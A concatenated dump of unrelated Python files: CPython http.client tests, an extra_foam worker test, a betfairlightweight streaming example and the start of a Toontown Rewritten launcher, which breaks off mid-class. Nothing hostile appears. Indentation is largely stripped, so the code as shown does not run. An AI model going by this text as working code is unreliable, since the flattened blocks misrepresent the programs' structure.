self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
threading = support.import_module("threading")
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
                    idx = limit - datalen - 1
                    break
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
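# A minimal usage sketch of Readliner (illustrative only; the stream contents and the
# helper name below are made up for this example and are not part of the test suite).
# It mirrors test_read1 above: any bounded read callable can be wrapped so that its
# output is consumed line by line.
def _readliner_example():
    import io
    stream = io.BytesIO(b"alpha\nbeta\n")
    readliner = Readliner(lambda: stream.read(4))  # reads at most 4 bytes per call
    assert readliner.readline(100) == b"alpha\n"
    assert readliner.readline(100) == b"beta\n"
    assert readliner.readline(100) == b""          # EOF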
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
        self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(HeaderTests, OfflineTest, BasicTest, TimeoutTest,
PersistenceTest,
HTTPSTest, RequestBodyTest, SourceAddressTest,
HTTPResponseTest, ExtendedReadTest,
ExtendedReadTestChunked, TunnelTests)
if __name__ == '__main__':
test_main()
|
test_worker.py
|
import unittest
from threading import Thread
from unittest.mock import MagicMock, patch
import multiprocessing as mp
from . import _TestDataMixin
from extra_foam.pipeline.exceptions import ProcessingError, StopPipelineError
from extra_foam.pipeline.f_worker import TrainWorker, PulseWorker
from extra_foam.config import config, ExtensionType
from extra_foam.pipeline.f_zmq import FoamZmqClient
import numpy as np
from karabo_bridge import Client
@patch.dict(config._data, {"DETECTOR": "LPD"})
class TestWorker(_TestDataMixin, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._pause_ev = mp.Event()
cls._close_ev = mp.Event()
@patch('extra_foam.ipc.ProcessLogger.debug')
@patch('extra_foam.ipc.ProcessLogger.error')
def testRunTasks(self, error, debug):
for kls in (TrainWorker, PulseWorker):
worker = kls(self._pause_ev, self._close_ev)
for proc in worker._tasks:
proc.update = MagicMock()
proc.process = MagicMock()
worker._run_tasks({})
proc = worker._tasks[0]
# test responses to different Exceptions
proc.process.side_effect = ValueError()
worker._run_tasks({})
debug.assert_called_once()
self.assertIn("Unexpected Exception", debug.call_args_list[0][0][0])
debug.reset_mock()
error.assert_called_once()
error.reset_mock()
proc.process.side_effect = ProcessingError()
worker._run_tasks({})
debug.assert_called_once()
self.assertNotIn("Unexpected Exception", debug.call_args_list[0][0][0])
debug.reset_mock()
error.assert_called_once()
error.reset_mock()
proc.process.side_effect = StopPipelineError()
with self.assertRaises(StopPipelineError):
worker._run_tasks({})
debug.reset_mock()
error.reset_mock()
# Check that the extensions are enabled appropriately
extensions_enabled = kls == TrainWorker
            self.assertEqual(worker._extension is not None, extensions_enabled)
            self.assertEqual(worker._detector_extension is not None, extensions_enabled)
@patch('extra_foam.ipc.ProcessLogger.debug')
def testExtensions(self, _):
worker = TrainWorker(self._pause_ev, self._close_ev)
# Disable processors
worker._run_tasks = MagicMock()
# Generate mock data
mock_data = self.simple_data(1, (10, 10))[0]
detector, key = mock_data["catalog"].main_detector.split()
# Mock the input and output pipes
worker._input.start = MagicMock()
worker._input.get = MagicMock(return_value=mock_data)
worker._output = MagicMock()
# Mock the database configuration for the extension ZmqOutQueue's
extension_endpoint = "ipc://foam-extension"
detector_extension_endpoint = "ipc://bridge-extension"
worker._extension._meta.hget_all = MagicMock(return_value={ ExtensionType.ALL_OUTPUT.value: extension_endpoint })
worker._detector_extension._meta.hget_all = MagicMock(return_value={ ExtensionType.DETECTOR_OUTPUT.value: detector_extension_endpoint })
# Start worker
self._pause_ev.set()
worker_thread = Thread(target=worker.run)
worker_thread.start()
# Create clients
bridge_client = Client(detector_extension_endpoint, timeout=1)
foam_client = FoamZmqClient(extension_endpoint, timeout=1)
# Test received detector data
detector_data, _ = bridge_client.next()
np.testing.assert_array_equal(detector_data[f"EF_{detector}"][key],
mock_data["processed"].image.masked_mean)
# Test received special suite data
foam_data = foam_client.next()
for key in foam_data:
if key != "processed":
self.assertEqual(foam_data[key], mock_data[key])
else:
# Just comparing the detector image is enough for the
# ProcessedData object.
np.testing.assert_array_equal(foam_data[key].image.masked_mean,
mock_data[key].image.masked_mean)
# Close worker
self._close_ev.set()
worker_thread.join(timeout=1)
|
examplestreaming.py
|
import logging
import queue
import threading
import betfairlightweight
from betfairlightweight.filters import (
streaming_market_filter,
streaming_market_data_filter,
)
# setup logging
logging.basicConfig(level=logging.INFO) # change to DEBUG to see log all updates
# create trading instance (app key must be activated for streaming)
trading = betfairlightweight.APIClient("username", "password", app_key="appKey")
# login
trading.login()
# create queue
output_queue = queue.Queue()
# create stream listener
listener = betfairlightweight.StreamListener(output_queue=output_queue)
# create stream
stream = trading.streaming.create_stream(listener=listener)
# create filters (GB WIN racing)
market_filter = streaming_market_filter(
event_type_ids=["7"], country_codes=["GB"], market_types=["WIN"]
)
market_data_filter = streaming_market_data_filter(
fields=["EX_BEST_OFFERS", "EX_MARKET_DEF"], ladder_levels=3
)
# subscribe
streaming_unique_id = stream.subscribe_to_markets(
market_filter=market_filter,
market_data_filter=market_data_filter,
conflate_ms=1000, # send update every 1000ms
)
# start stream in a new thread (in production you would need error handling)
t = threading.Thread(target=stream.start, daemon=True)
t.start()
"""
Data can also be accessed by using the snap function in the listener, e.g:
market_books = listener.snap(
market_ids=[1.12345323]
)
Errors need to be caught at stream.start, resubscribe can then be used to
prevent full image being sent, e.g:
streaming_unique_id = stream.subscribe_to_markets(
market_filter=market_filter,
market_data_filter=market_data_filter,
conflate_ms=1000, # send update every 1000ms
initial_clk=listener.initial_clk,
clk=listener.clk,
)
The streaming unique id is returned in the market book which allows multiple
streams to be differentiated if multiple streams feed into the same queue.
"""
# check for updates in output queue
while True:
market_books = output_queue.get()
print(market_books)
for market_book in market_books:
print(
market_book,
market_book.streaming_unique_id, # unique id of stream (returned from subscribe request)
market_book.streaming_update, # json update received
market_book.market_definition, # streaming definition, similar to catalogue request
market_book.publish_time, # betfair publish time of update
)
|
launcher.py
|
"""
TODO LIST:
- Get mirai python built with _ssl and bz2
- Fix up patcher.
- Graphical User Interface (inb4 python needs m0ar)
"""
from fsm.FSM import FSM
import urllib, json, sys, os, subprocess, threading, time, stat, getpass
import settings, localizer, messagetypes
from urllib.request import urlopen
from urllib.parse import urlencode
import os
import http.client as httplib
class TTRLauncher(FSM):
"""
This is the "main" class that powers the Toontown Rewritten launcher. It manages
everything the launcher needs to do, including manage all the "sub-threads" that
carry out tasks such as patching.
As of right now, the launcher consists of 3 threads:
- "main-thread": This is the thread which holds this class, and keeps everything
running properly. This also manages state transitions as well as submitting
data to and from the web server.
- "graphical": This thread will hold the GUI side of the launcher, such as abs
wyPython interface. Usually, this is what the end user will see when running the
launcher.
- "patcher": Since the majority of the patching process is locking, it has to be
run on a separate thread to keep the main thread alive. This thread will deal with
all the files it needs to download, as well as update/patch. During the download
process, the patcher will also report back the current download percentage of the
current file it is downloading.
ERR001: This occurs when the website returns broken JSON.
ERR002: This occurs when the website returns a Non-OK response when authenticating.
ERR003: We got a response, but the data received was invalid.
ERR004: The response said our login was invalid (failed).
ERR005: User tried to submit TFA code without entering anything.
    ERR006: Account server is temporarily unavailable (HTTP 503).
    ERR007: The login was delayed (queued), but no queue token was provided.
"""
def __init__(self, input, output):
FSM.__init__(self)
self.input = input
self.output = output
self.transitions = {'Off': [
'CheckForUpdates', 'Off', 'LaunchGame'],
'CheckForUpdates': [
'Patch', 'Off'],
'GetCredentials': [
'SubmitCredentials', 'Off'],
'SubmitCredentials': [
'LoginResponse', 'Off'],
'LoginResponse': [
'GetCredentials', 'GetTFACode', 'Delayed', 'LaunchGame', 'Off'],
'GetTFACode': [
'SubmitTFACode', 'GetCredentials', 'Off'],
'SubmitTFACode': [
'LoginResponse', 'Off'],
'Delayed': [
